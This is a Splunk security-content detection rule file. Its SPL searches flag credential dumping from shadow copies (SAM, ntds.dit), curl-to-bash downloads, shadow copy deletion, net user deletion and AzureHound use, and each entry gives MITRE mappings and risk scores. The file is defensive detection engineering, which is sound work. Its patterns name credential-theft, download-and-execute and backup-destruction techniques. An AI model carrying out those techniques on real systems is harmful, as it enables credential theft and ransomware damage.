action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects the use of the copy command to dump credentials from a shadow copy so that you can detect potential threats earlier and mitigate the risks associated with credential dumping. The detection is made by using a Splunk query to search for specific processes that indicate credential dumping activity. The query looks for processes with command lines that include references to certain files, such as "sam", "security", "system", and "ntds.dit", located in system directories like "system32" or "windows". The detection is important because it suggests that an attacker is attempting to extract credentials from a shadow copy. Credential dumping is a common technique used by attackers to obtain sensitive login information and gain unauthorized access to systems to escalate privileges, move laterally within the network, or gain unauthorized access to sensitive data. False positives might occur since legitimate processes might also reference these files. During triage, it is crucial to review the process details, including the source and the command that is run. Additionally, you must capture and analyze any relevant on-disk artifacts and investigate concurrent processes to determine the source of the attack.
action.notable.param.rule_title = Credential Dumping via Copy Command from Shadow Copy
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` (Processes.process=*\\system32\\config\\sam* OR Processes.process=*\\system32\\config\\security* OR Processes.process=*\\system32\\config\\system* OR Processes.process=*\\windows\\ntds\\ntds.dit*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_copy_command_from_shadow_copy_filter`

[ESCU - Credential Dumping via Symlink to Shadow Copy - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the creation of a symlink to a shadow copy to identify potential threats earlier and mitigate the risks associated with symlink creation to shadow copies. The detection is made by using a Splunk query that searches for processes with commands containing "mklink" and "HarddiskVolumeShadowCopy". This analytic retrieves information such as the destination, user, process name, process ID, parent process, original file name, and parent process ID from the Endpoint.Processes data model. The detection is important because it indicates potential malicious activity since attackers might use this technique to manipulate or delete shadow copies, which are used for system backup and recovery. This detection helps to determine if an attacker is attempting to cover their tracks or prevent data recovery in the event of an incident. The impact of such an attack can be significant since it can hinder incident response efforts, prevent data restoration, and potentially lead to data loss or compromise. Next steps include reviewing the details of the process, such as the destination and the user responsible for creating the symlink. Additionally, you must examine the parent process, any relevant on-disk artifacts, and concurrent processes to identify the source of the attack.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects the creation of a symlink to a shadow copy to identify potential threats earlier and mitigate the risks associated with symlink creation to shadow copies. The detection is made by using a Splunk query that searches for processes with commands containing "mklink" and "HarddiskVolumeShadowCopy". This analytic retrieves information such as the destination, user, process name, process ID, parent process, original file name, and parent process ID from the Endpoint.Processes data model. The detection is important because it indicates potential malicious activity since attackers might use this technique to manipulate or delete shadow copies, which are used for system backup and recovery. This detection helps to determine if an attacker is attempting to cover their tracks or prevent data recovery in the event of an incident. The impact of such an attack can be significant since it can hinder incident response efforts, prevent data restoration, and potentially lead to data loss or compromise. Next steps include reviewing the details of the process, such as the destination and the user responsible for creating the symlink. Additionally, you must examine the parent process, any relevant on-disk artifacts, and concurrent processes to identify the source of the attack.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-09-16
action.escu.modification_date = 2021-09-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Credential Dumping via Symlink to Shadow Copy - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Credential Dumping"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to create symlink to a shadow copy to grab credentials.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Credential Dumping via Symlink to Shadow Copy - Rule
action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects the creation of a symlink to a shadow copy to identify potential threats earlier and mitigate the risks associated with symlink creation to shadow copies. The detection is made by using a Splunk query that searches for processes with commands containing "mklink" and "HarddiskVolumeShadowCopy". This analytic retrieves information such as the destination, user, process name, process ID, parent process, original file name, and parent process ID from the Endpoint.Processes data model. The detection is important because it indicates potential malicious activity since attackers might use this technique to manipulate or delete shadow copies, which are used for system backup and recovery. This detection helps to determine if an attacker is attempting to cover their tracks or prevent data recovery in the event of an incident. The impact of such an attack can be significant since it can hinder incident response efforts, prevent data restoration, and potentially lead to data loss or compromise. Next steps include reviewing the details of the process, such as the destination and the user responsible for creating the symlink. Additionally, you must examine the parent process, any relevant on-disk artifacts, and concurrent processes to identify the source of the attack.
action.notable.param.rule_title = Credential Dumping via Symlink to Shadow Copy
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*mklink* Processes.process=*HarddiskVolumeShadowCopy* by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.parent_process_name Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_symlink_to_shadow_copy_filter`

[ESCU - CSC Net On The Fly Compilation - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects a suspicious compile-before-delivery approach using the .NET compiler csc.exe. This technique has been seen used by several adversaries, malware families, and even red teams, taking advantage of the csc.exe .NET compiler tool to compile malicious .NET code on the fly in order to evade detection by security products. This is a good hunting query: check further the file or process created after this event, and check the file path passed to csc.exe, which is the .NET source code. Aside from that, PowerShell is capable of using this compiler to execute .NET code from a PowerShell script, so a filter for that case is needed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027.004", "T1027"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a suspicious compile-before-delivery approach using the .NET compiler csc.exe. This technique has been seen used by several adversaries, malware families, and even red teams, taking advantage of the csc.exe .NET compiler tool to compile malicious .NET code on the fly in order to evade detection by security products. This is a good hunting query: check further the file or process created after this event, and check the file path passed to csc.exe, which is the .NET source code. Aside from that, PowerShell is capable of using this compiler to execute .NET code from a PowerShell script, so a filter for that case is needed.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = A network operator or systems administrator may utilize an automated PowerShell script that executes .NET code, which may generate false positives. A filter is needed.
action.escu.creation_date = 2021-11-12
action.escu.modification_date = 2021-11-12
action.escu.confidence = high
action.escu.full_search_name = ESCU - CSC Net On The Fly Compilation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - CSC Net On The Fly Compilation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027.004", "T1027"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_csc` Processes.process = "*/noconfig*" Processes.process = "*/fullpaths*" Processes.process = "*@*" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `csc_net_on_the_fly_compilation_filter`

[ESCU - Curl Download and Bash Execution - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the use of curl on Linux or macOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies the use of curl on Linux or macOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives should be limited; however, filtering may be required.
action.escu.creation_date = 2021-12-10
action.escu.modification_date = 2021-12-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Curl Download and Bash Execution - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ingress Tool Transfer", "Log4Shell CVE-2021-44228", "Linux Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ attempting to download a remote file and run it with bash.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Curl Download and Bash Execution - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer", "Log4Shell CVE-2021-44228", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-44228"], "impact": 80, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the use of curl on Linux or macOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.
action.notable.param.rule_title = Curl Download and Bash Execution
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl (Processes.process="*-s *") OR (Processes.process="*|*" AND Processes.process="*bash*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `curl_download_and_bash_execution_filter`

[ESCU - Delete ShadowCopy With PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects a PowerShell command to delete shadow copies using the WMIC PowerShell module. This technique was seen used by a recent adversary deploying DarkSide ransomware, where a child process of PowerShell executed a hex-encoded command to delete shadow copies. This hex-encoded command was decoded by PowerShell logging.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects a PowerShell command to delete shadow copies using the WMIC PowerShell module. This technique was seen used by a recent adversary deploying DarkSide ransomware, where a child process of PowerShell executed a hex-encoded command to delete shadow copies. This hex-encoded command was decoded by PowerShell logging.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting PowerShell logs from your endpoints. Make sure you enable the needed registry settings to monitor this event.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2022-05-02
action.escu.modification_date = 2022-05-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - Delete ShadowCopy With PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["DarkSide Ransomware", "Ransomware", "Revil Ransomware", "DarkGate Malware"]
action.risk = 1
action.risk.param._risk_message = An attempt to delete ShadowCopy was performed using PowerShell on $Computer$ by $User$.
action.risk.param._risk = [{"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 81}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Delete ShadowCopy With PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Ransomware", "Revil Ransomware", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects a PowerShell command to delete shadow copies using the WMIC PowerShell module. This technique was seen used by a recent adversary deploying DarkSide ransomware, where a child process of PowerShell executed a hex-encoded command to delete shadow copies. This hex-encoded command was decoded by PowerShell logging.
action.notable.param.rule_title = Delete ShadowCopy With PowerShell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText= "*ShadowCopy*" (ScriptBlockText = "*Delete*" OR ScriptBlockText = "*Remove*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `delete_shadowcopy_with_powershell_filter`

[ESCU - Deleting Of Net Users - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects a suspicious net.exe/net1.exe command line used to delete a user on a system. This technique may be used by an administrator for legitimate purposes; however, this behavior has been used in the wild to impair users or to delete the tracks an adversary created during lateral movement to additional systems. During triage, review parallel processes for additional behavior. Identify any other user accounts created before or after.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a suspicious net.exe/net1.exe command line used to delete a user on a system. This technique may be used by an administrator for legitimate purposes; however, this behavior has been used in the wild to impair users or to delete the tracks an adversary created during lateral movement to additional systems. During triage, review parallel processes for additional behavior. Identify any other user accounts created before or after.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = System administrators or scripts may delete user accounts via this technique. Filter as needed.
action.escu.creation_date = 2023-06-13
action.escu.modification_date = 2023-06-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - Deleting Of Net Users - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["XMRig", "Graceful Wipe Out Attack", "DarkGate Malware"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to delete accounts.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deleting Of Net Users - Rule
action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Graceful Wipe Out Attack", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects a suspicious net.exe/net1.exe command line used to delete a user on a system. This technique may be used by an administrator for legitimate purposes; however, this behavior has been used in the wild to impair users or to delete the tracks an adversary created during lateral movement to additional systems. During triage, review parallel processes for additional behavior. Identify any other user accounts created before or after.
action.notable.param.rule_title = Deleting Of Net Users
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` AND Processes.process="*user*" AND Processes.process="*/delete*" by Processes.process_name Processes.original_file_name Processes.dest Processes.user Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `deleting_of_net_users_filter`

[ESCU - Deleting Shadow Copies - Rule]
action.escu = 0
action.escu.enabled = 1
description = The vssadmin.exe utility is used to interact with the Volume Shadow Copy Service. Wmic is an interface to the Windows Management Instrumentation. This search looks for either of these tools being used to delete shadow copies.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The vssadmin.exe utility is used to interact with the Volume Shadow Copy Service. Wmic is an interface to the Windows Management Instrumentation. This search looks for either of these tools being used to delete shadow copies.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = vssadmin.exe and wmic.exe are standard applications shipped with modern versions of Windows. They may be used by administrators to legitimately delete old backup copies, although this is typically rare.
action.escu.creation_date = 2020-11-09
action.escu.modification_date = 2020-11-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Deleting Shadow Copies - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Log Manipulation", "SamSam Ransomware", "Ransomware", "Clop Ransomware", "CISA AA22-264A", "Prestige Ransomware", "Chaos Ransomware", "LockBit Ransomware", "DarkGate Malware", "Rhysida Ransomware"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to delete shadow copies.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 81}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 81}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deleting Shadow Copies - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Log Manipulation", "SamSam Ransomware", "Ransomware", "Clop Ransomware", "CISA AA22-264A", "Prestige Ransomware", "Chaos Ransomware", "LockBit Ransomware", "DarkGate Malware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The vssadmin.exe utility is used to interact with the Volume Shadow Copy Service. Wmic is an interface to the Windows Management Instrumentation. This search looks for either of these tools being used to delete shadow copies.
action.notable.param.rule_title = Deleting Shadow Copies
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe OR Processes.process_name=wmic.exe) Processes.process=*delete* Processes.process=*shadow* by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `deleting_shadow_copies_filter`

[ESCU - Detect AzureHound Command-Line Arguments - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Because the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Because the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Unknown.
action.escu.creation_date = 2024-03-14
action.escu.modification_date = 2024-03-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect AzureHound Command-Line Arguments - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Discovery Techniques"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ using AzureHound to enumerate AzureAD.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect AzureHound Command-Line Arguments - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Because the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives.
action.notable.param.rule_title = Detect AzureHound Command-Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*invoke-azurehound*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter` [ESCU - Detect AzureHound File Modifications - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. 
